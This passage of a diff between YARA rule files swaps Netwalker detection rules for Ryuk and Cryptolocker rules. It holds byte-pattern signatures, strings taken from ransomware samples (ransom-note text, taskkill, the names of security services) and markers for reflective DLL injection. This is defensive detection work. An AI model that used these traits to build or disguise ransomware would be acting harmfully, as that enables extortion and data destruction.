8B????0FBE????C1????0B??BA????????6B????8B????0FBE????C1????0B??BA????????6B????8B????89????B8????????6B????8B????0FBE??????B9????????C1????8B????0FBE??????C1????0B??BA????????D1??8B????0FBE??????C1????0B??B9????????6B????8B????0FBE??????C1????0B??B9????????C1????8B????89????B8????????6B????8B????0FBE??????B9????????C1????8B????0FBE??????C1????0B??BA????????D1??8B????0FBE??????C1????0B??B9????????6B????8B????0FBE??????C1????0B??B9????????D1??8B????89????B8????????6B????8B????0FBE??????B9????????C1????8B????0FBE??????C1????0B??BA????????D1??8B????0FBE??????C1????0B??B9????????6B????8B????0FBE??????C1????0B??B9????????6B????8B????89????8B??5DC3CCCCCC558B??B8????????6B????8B????C7????????????B8????????6B????8B????C7????????????B8????????6B????8B????0FB6????B9????????C1????8B????0FB6????C1????0B??BA????????D1??8B????0FB6????C1????0B??B9????????6B????8B????0FB6????C1????0B??B9????????6B????8B????89????BA????????6B????8B????0FB6??????B8????????C1????8B????0FB6??????C1????0B??B9????????D1??8B????0FB6??????C1????0B??B8????????6B????8B????0FB6??????C1????0B??B8????????6B????8B????89????5DC3CCCCCC558B??83????83??????75??E9????????8B????508D????51E8????????83????BA????????6B????8B????8B????83????B8????????6B????8B????89????B9????????6B????8B????83??????75??B9????????6B????8B????8B????83????BA????????6B????8B????89????83??????77??C7????????????EB??8B????83????89????8B????3B????73??8B????03????0FB6??8B????0FB6??????33??8B????03????88??EB??EB??C7????????????EB??8B????83????89????83??????73??8B????03????0FB6??8B????0FB6??????33??8B????03????88??EB??8B????83????89????8B????83????89????8B????83????89????E9????????8B??5DC3CCCCCCCCCCCCCCCC558B??83????C7????????????EB??8B????83????89????83??????7D??8B????8B????8B????8B????89??????EB??C7????????????EB??8B????83????89????83??????0F8E????????B9????????6B????B8????????C1????8B??????03??????BA????????6B????89??????B9????????6B????B8????????6B????8B??????33??????C1????B8????????6B????B8????????6B????8B??????33??????C1????0B??B8????????6B????89??????BA????????C1????B8????????6B????8B??????03??????B8????????C1????89??????B9????????C1????BA????????C1????8B??????33??????C1????B9????????C1????BA????????C1????8B??????33??????C1????0B??BA????????C1????89??????B8????????6B????BA????????C1????8B??????03??????B9????????6B????89??????B8????????6B????BA????????6B????8B??????33??????C1????BA????????6B????BA????????6B????8B??????33??????C1????0B??BA????????6B????89??????B9????????C1????BA????????6B????8B??????03??????BA????????C1????89??????B8????????C1????B9????????C1????8B??????33??????C1????B8????????C1????B9????????C1????8B??????33??????C1????0B??B9????????C1????89??????BA????????C1????B8????????6B????8B??????03??????B8????????C1????89??????B9????????6B????B8????????C1????8B??????33??????C1????BA????????6B????BA????????C1????8B??????33??????C1????0B??BA????????6B????89??????B9????????6B????B8????????6B????8B??????03??????B8????????6B????89??????BA????????6B????B9????????6B????8B??????33??????C1????B9????????6B????B9????????6B????8B??????33??????C1????0B??B9????????6B????89??????B8????????C1????B9????????6B????8B??????03??????B9????????C1????89??????BA????????6B????B9????????C1????8B??????33??????C1????B8????????6B????B8????????C1????8B??????33??????C1????0B??B8????????6B????89??????BA????????6B????B9????????6B????8B??????03??????B9????????6B????89??????B8????????6B????BA????????6B????8B??????33??????C1????BA????????6B????BA????????6B????8B??????33??????C1????0B??BA????????6B????89??????B9????????D1??BA????????6B????8B??????03??????BA????????D1??89??????B8????????6B????BA????????D1??8B??????33??????C1????B9????????6B????B9????????D1??8B??????33??????C1????0B??B9????????6B????89??????B8????????6B????BA????????6B????8B??????03??????BA????????6B????89??????B9????????6B????B8????????6B????8B??????33??????C1????B8????????6B????B8????????6B????8B??????33??????C1????0B??B8????????6B????89??????BA????????D1??B8????????6B????8B??????03??????B8????????D1??89??????B9????????6B????B8????????D1??8B??????33??????C1????BA????????6B????BA????????D1??8B??????33??????C1????0B??BA????????6B????89??????B9????????6B????B8????????6B????8B??????03??????B8????????6B????89??????BA????????6B????B9????????6B????8B??????33??????C1????B9????????6B????B9????????6B????8B??????33??????C1????0B??B9????????6B????89??????B8????????6B????BA????????6B????8B??????03??????BA????????6B????89??????B9????????6B????B8????????6B????8B??????33??????C1????B8????????6B????B8????????6B????8B??????33??????C1????0B??B8????????6B????89??????BA????????6B???? }
-		$pattern2 = { CCCCCCCCCCA1????????C3CCCCCCCCCCCCCCCCCCCC538B??????5533??5785??74??8B??????85??74??8B????85??74??C1????50E8????????83????89??85??74??8B????5633??85??74??5653E8????????83????85??74??8B????85??74??8D??????89??????5150E8????????83????85??74??8B????8B??8B??????89????FF????8B????463B??72??39????B9????????5E0F44??5F8B??5D5BC35F5D33??5BC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC535556578B??????85??74??83????74??8B????85??74??8B??????85??74??33??85??74??8B??????660F1F??????85??74??8B??53FF????E8????????EB??E8????????8D????8B??FF????8B??53FF??83????85??75??463B????72??5F5E5D33??5BC35F5E5DB8????????5BC3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC6A??FF??????FF??????E8????????83????C3CCCCCCCCCCCCCCCCCCCCCCCCCC6A??FF??????FF??????E8????????83????C3CCCCCCCCCCCCCCCCCCCCCCCCCC83????????????5674??8B??????85??74??56E8????????8B????50E8????????83????85??75??A1????????6A??83????5650E8????????83????85??75??56E8????????83????85??74??8D????66??????74??83????83????75??33??5EC383????74??A1????????6A??83????5150E8????????83????85??74??B8????????5EC3CCCCCCCCCCCCCCCCCCCC83????????????74??8B??????85??74??A1????????6A??83????5150E8????????83????85??74??B8????????C333??C3CCCCCCCCCCCCCCCCCCCCCCCCCCCC83????????????5674??A1????????83??????74??8B??????85??74??56E8????????8B??????????83????83????75??83??????74??66????????75??0FB7??83????72??83????76??83????66??????76??6A??8D????5650E8????????83????85??74??B8????????5EC333??5EC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC83????????????74??A1????????83????????????74??8B??????85??74??6A??05????????5150E8????????83????85??74??B8????????C333??C3CCCCCC83????????????74??A1????????83????????????74??8B??????85??74??6A??05????????5150E8????????83????85??74??B8????????C333??C3CCCCCC83????????????74??8B??????85??74??A1????????83??????74??6A??83????5150E8????????83????85??74??B8????????C333??C3CCCCCCCCCCCCCCCC83????????????74??8B??????85??74??A1????????83??????74??6A??83????5150E8????????83????85??74??B8????????C333??C3CCCCCCCCCCCCCCCC83????????????5674??8B??????85??74??A1????????83??????74??51E8????????8B??83????85??74??8B??????????6A??83????5651E8????????83????85??74??B8????????5EC356E8????????83????33??5EC3CCCCCCCCCCCCCC535556576A??E8????????8B??83????85??0F84????????8B??660F1F??????0FB7????83????51E8????????8B??83????85??74??0FB7????51FF????57E8????????83????83????????????74??A1????????83??????74??6A??83????5750E8????????83????85??74??E8????????8B????3B????74??6A??51E8????????8B??83????85??74??E8????????6A??538B????FF??E8????????538B??????????FF??57E8????????83????8B??03??85??0F85????????55E8????????83????E8????????6A??8B??????????FF??E9????????CCCCCCCCCCCCCC83????5533??565739??????????0F84????????8B??????85??0F84????????8B??????85??0F84????????53E8????????8B??????????FF??83??????8B??74??E8????????FF????8B??????????FF??89??????E8????????8D??????516A??8B??????????8D??????516A??57FF??85??74??8B??????89????83????74??E8????????8B??????????FF??2B??3D????????77??83??????75??5B5F5E8B??5D83????C3BD????????5B5F5E8B??5D83????C35F5E33??5D83????C383????558B??????85??0F84????????5333??5733??89??????89??????E8????????8D??????518D??????8B??????????5157576A??FF????FF??85??0F85????????E8????????8B??????????FF??3D????????0F85????????FF??????E8????????83????89??????85??0F84????????56E8????????8D??????518D??????8B??????????51FF??????FF??????6A??FF????FF??85??74??33??39??????76??8B??????0F1F??????????E8????????8B??????68????????FF????8B??????????FF??FF??89??????8D????????????5053E8????????8B??83????85??74??FF??????68????????E8????????83????89????474683????3B??????72??8B??????FF??????E8????????83????85??74??85??74??E8????????6A??6A??538B??????????57FF??33??85??74??E8????????FF????8B??????????FF??463B??72??53E8????????83????5EE8????????8D??????516A??FF????8B??????????FF??5F5B85??74??8D??????50FF????E8????????83????E8????????FF????8B??????????FF??55E8????????83????33??5D83????C2????CCCCCCCCCCCCCCCCCCCCCCCC83????568B??????85??74??E8????????8D??????516A??8B??????????56FF??85??74??8D??????5056E8????????83????E8????????568B??????????FF??33??5E83????C2????CCCCCCCCCCCC83????83????????????5356570F84????????A1????????83??????0F84????????55E8????????68????????6A??6A??8B??????????FF??8B??89??????85??0F84????????660F1F????????????C7??????????????C7??????????????C7??????????????E8????????8D??????518D??????8B??????????518D??????516A??6A??6A??6A??55FF??85??0F85????????E8????????8B??????????FF??3D????????0F85????????FF??????E8????????83????89??????85??0F84????????E8????????8B??????8D??????518D??????8B??????????518D??????51FF??????566A??6A??55FF??85??0F84????????33??33??89??????39??????0F86????????0F1F??????????FF??E8????????83????85??75??FF????E8????????83????85??74??E8????????68????????FF??8B??????????55FF??89??????85??74??6A??E8????????8B??83????85??74??8B??????8D????????????5189????8B??????5389????E8????????8B??83????85??74??5568????????E8????????83????89????478B??????8B??????83????4089??????3B??????0F82????????85??74??85??74??E8????????6A??6A??538B??????????57FF??33??85??74??0F1F????E8????????FF????8B??????????FF??463B??72??53E8????????83????FF??????E8????????83????E8????????68????????8B??????????FF??E9????????5D5F5E33??5B83????C2????CCCCCC83????53558B??????565785??0F84????????8B????8D??????516A??55C7??????????????FF????85??0F88????????8B??????8D??????C7??????????????52508B??FF????85??0F88????????6A??8D??????6A??50E8????????33??83????B8????????66????????39??????0F8E????????8B??????8D??????5083????C7??????????????438B??89??????0F10??????8B??510F11??FF????85??0F88????????8B??????8D??????C7??????????????52508B??FF????85??0F88????????8B??????8D??????C7??????????????33??52508B??FF????83????????0F84????????FF??????E8????????83????85??0F85????????8B??????8D??????89??????52508B??FF????85??0F88????????8B??????8D??????89??????52508B??FF????85??0F88????????8B??????8D??????89??????52508B??FF????85??0F88????????33?? }
-		$pattern3 = { CCCCCCCCCC558B??FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF??????????68????????FF??????????FF?????????? }
+		$x1 = "C:\\Windows\\System32\\cmd.exe" fullword ascii
+		$x2 = "\\System32\\cmd.exe" fullword wide
+		$s1 = "C:\\Users\\Admin\\Documents\\Visual Studio 2015\\Projects\\ConsoleApplication54new crypted" ascii
+		$s2 = "fg4tgf4f3.dll" fullword wide
+		$s3 = "lsaas.exe" fullword wide
+		$s4 = "\\Documents and Settings\\Default User\\sys" fullword wide
+		$s5 = "\\Documents and Settings\\Default User\\finish" fullword wide
+		$s6 = "\\users\\Public\\sys" fullword wide
+		$s7 = "\\users\\Public\\finish" fullword wide
+		$s8 = "You will receive btc address for payment in the reply letter" fullword ascii
+		$s9 = "hrmlog" fullword wide
+		$s10 = "No system is safe" fullword ascii
+		$s11 = "keystorage2" fullword wide
+		$s12 = "klnagent" fullword wide
+		$s13 = "sqbcoreservice" fullword wide
+		$s14 = "tbirdconfig" fullword wide
+		$s15 = "taskkill" fullword wide
+		$op0 = { 8b 40 10 89 44 24 34 c7 84 24 c4 }
+		$op1 = { c7 44 24 34 00 40 00 00 c7 44 24 38 01 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and any of ( $pattern* )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
 }
-
-rule TRELLIX_ARC_Netwalker_Signed : FILE
+rule TRELLIX_ARC_RANSOM_RYUK_May2021 : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Netwalker ransomware digitally signed."
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "6806b917-2e02-57e3-887a-b4c12db83653"
-		date = "2020-03-30"
-		modified = "2020-11-20"
-		reference = "https://www.ccn-cert.cni.es/comunicacion-eventos/comunicados-ccn-cert/9802-publicado-un-informe-de-codigo-danino-sobre-netwalker.html"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_netwalker.yar#L30-L47"
+		description = "Rule to detect latest May 2021 compiled Ryuk variant"
+		author = "Marc Elias | McAfee ATR Team"
+		id = "6e415a9e-7373-50a8-ad57-f95220faed9c"
+		date = "2021-05-21"
+		modified = "2021-07-12"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Ryuk.yar#L91-L113"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "d78ed22771d7c93516375afb8fd2fd7baa40a357ec3c247939a10d11f80ae226"
-		score = 75
+		hash = "8f368b029a3a5517cb133529274834585d087a2d3a5875d03ea38e5774019c8a"
+		logic_hash = "b379c1182e60ce8c777668386d8cbd08350dd2363770dec56502bf44aaf5d7f6"
+		score = 50
 		quality = 70
-		tags = "FILE"
-		note = "The rule will hit also some Dridex samples digitally signed"
+		tags = "RANSOMWARE, FILE"
+		version = "0.1"
+
+	strings:
+		$ryuk_filemarker = "RYUKTM" fullword wide ascii
+		$sleep_constants = { 68 F0 49 02 00 FF (15|D1) [0-4] 68 ?? ?? ?? ?? 6A 01 }
+		$icmp_echo_constants = { 68 A4 06 00 00 6A 44 8D [1-6] 5? 6A 00 6A 20 [5-20] FF 15 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "/CN=EWBTCAXQKUMDTHCXCZ" and pe.signatures [ i ] . serial == "17:16:bb:93:fb:a9:a2:41:ba:a8:2e:c7:5e:ff:0c" or pe.signatures [ i ] . thumbprint == "a4:28:e9:4a:61:3a:1f:cf:ff:08:bf:e7:61:51:64:31:1a:6f:87:bc" )
+		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 200KB and ( $ryuk_filemarker or ( $sleep_constants and $icmp_echo_constants ) )
 }
-rule TRELLIX_ARC_Netwalker : RANSOMWARE FILE
+rule TRELLIX_ARC_Cryptolocker_Set1 : RANSOMWARE
 {
 	meta:
-		description = "Rule based on code overlap in RagnarLocker ransomware"
-		author = "McAfee ATR team"
-		id = "80097a40-534a-5e1b-8fde-e4d832d76698"
-		date = "2020-06-14"
-		modified = "2020-11-20"
+		description = "Detection of Cryptolocker Samples"
+		author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
+		id = "13ccc6d3-c2cc-59ac-81af-ec11fb78cd41"
+		date = "2014-04-13"
+		modified = "2020-08-14"
 		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_netwalker.yar#L49-L75"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Cryptolocker.yar#L1-L40"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "8c56ebed9e097d294045de46942c708da9ba7e01475dcecb0c3d41fcc8004780"
+		logic_hash = "5be8d077537a59d860a972392be186d2697e55778f750d03b0fd3b0a73f714d9"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "RANSOMWARE"
 		rule_version = "v1"
 		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Cryptolocker"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$0 = {C88BF28B4330F76F3803C88B434813F2F76F2003C88B433813F2F76F3003C88B434013F2F76F2803C88B432813F2F76F4003C8894D6813F289756C8B4338F76F388BC88BF28B4328F76F4803C88B434813F2F76F2803C88B433013F2F76F400FA4CE}
-		$1 = {89542414895424108BEA8BDA8BFA423C22747C3C5C75588A023C5C744F3C2F744B3C2274473C6275078D5702B008EB3F3C6675078D5302B00CEB343C6E75078D5502B00AEB293C72750B8B542410B00D83C202EB1A3C74750B8B542414B00983C2}
-		$2 = {C8894D7013F28975748B4338F76F408BC88BF28B4340F76F3803C88B433013F2F76F4803C88B434813F2F76F3003C8894D7813F289757C8B4348F76F388BC88BF28B4338F76F4803C88B434013F2F76F400FA4CE}
-		$3 = {C07439473C2F75E380FB2A74DEEB2D8D4ABF8D422080F9190FB6D80FB6C28AD60F47D88AC6042080EA410FB6C880FA190FB6C60F47C83ACB754B46478A1684D2}
-		$4 = {8B433013F2F76F0803C88B432013F2F76F1803C88B0313F2F76F3803C88B430813F2F76F3003C88B433813F2F72F03C8894D3813F289753C8B4338F76F088BC8}
-		$5 = {F73101320E32213234329832E3320C332D334733643383339133A833BD33053463347C34543564358335AE36C3362937E9379A39BA390A3A203A443A183B2B3B}
-		$6 = {8B431813F2F76F4803C88B432813F2F76F3803C88B434013F2F76F200FA4CE0103C903C88B432013F2F76F4003C88B433013F2F76F3003C8894D6013F2897564}
+		$string0 = "static"
+		$string1 = " kscdS"
+		$string2 = "Romantic"
+		$string3 = "CompanyName" wide
+		$string4 = "ProductVersion" wide
+		$string5 = "9%9R9f9q9"
+		$string6 = "IDR_VERSION1" wide
+		$string7 = "  </trustInfo>"
+		$string8 = "LookFor" wide
+		$string9 = ":n;t;y;"
+		$string10 = "        <requestedExecutionLevel level"
+		$string11 = "VS_VERSION_INFO" wide
+		$string12 = "2.0.1.0" wide
+		$string13 = "<assembly xmlns"
+		$string14 = "  <trustInfo xmlns"
+		$string15 = "srtWd@@"
+		$string16 = "515]5z5"
+		$string17 = "C:\\lZbvnoVe.exe" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and all of them
+		12 of ( $string* )
 }
-rule TRELLIX_ARC_Win_Netwalker_Reflective_Dll_Injection_Decoded : RANSOMWARE
+rule TRELLIX_ARC_Cryptolocker_Rule2 : RANSOMWARE
 {
 	meta:
-		description = "Rule to detect Reflective DLL Injection Powershell Script dropping Netwalker, after hexadecimal decoded and xor decrypted "
-		author = "McAfee ATR Team"
-		id = "9562c0b9-e7ac-5b96-99cc-1df91cb617af"
-		date = "2020-05-28"
-		modified = "2020-11-20"
-		reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/ | https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_netwalker.yar#L77-L140"
+		description = "Detection of CryptoLocker Variants"
+		author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
+		id = "a6e808ef-4f60-5592-9440-69309784efb1"
+		date = "2014-04-14"
+		modified = "2020-08-14"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Cryptolocker.yar#L42-L79"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "fd29001b8b635e6c51270788bab7af0bb5adba6917c278b93161cfc2bc7bd6ae"
-		logic_hash = "e99c045f39e7933e877a4df7793aa5ea6be5a782bb079419501929ba99844dec"
+		logic_hash = "e8e03516cc0b669000c8d6b443be7a5f7a8b904abba98fd3c7d4f038de6741ab"
 		score = 75
-		quality = 30
+		quality = 70
 		tags = "RANSOMWARE"
 		rule_version = "v1"
 		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Cryptolocker"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$api0 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 20 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 41 6c 6c 6f 63 22 29 5d }
-		$api1 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 22 29 5d }
-		$api2 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 4c 6f 61 64 4c 69 62 72 61 72 79 41 22 29 5d }
-		$api3 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 57 72 69 74 65 50 72 6f 63 65 73 73 4d 65 6d 6f 72 79 22 29 5d }
-		$api4 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 46 72 65 65 22 29 5d }
-		$api5 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 22 29 5d }
-		$api6 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 43 6c 6f 73 65 48 61 6e 64 6c 65 22 29 5d }
-		$api7 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 3d 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 41 6c 6c 6f 63 45 78 22 29 5d }
-		$api8 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 3d 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 50 72 6f 74 65 63 74 45 78 22 29 5d }
-		$api9 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 4f 70 65 6e 50 72 6f 63 65 73 73 22 29 5d }
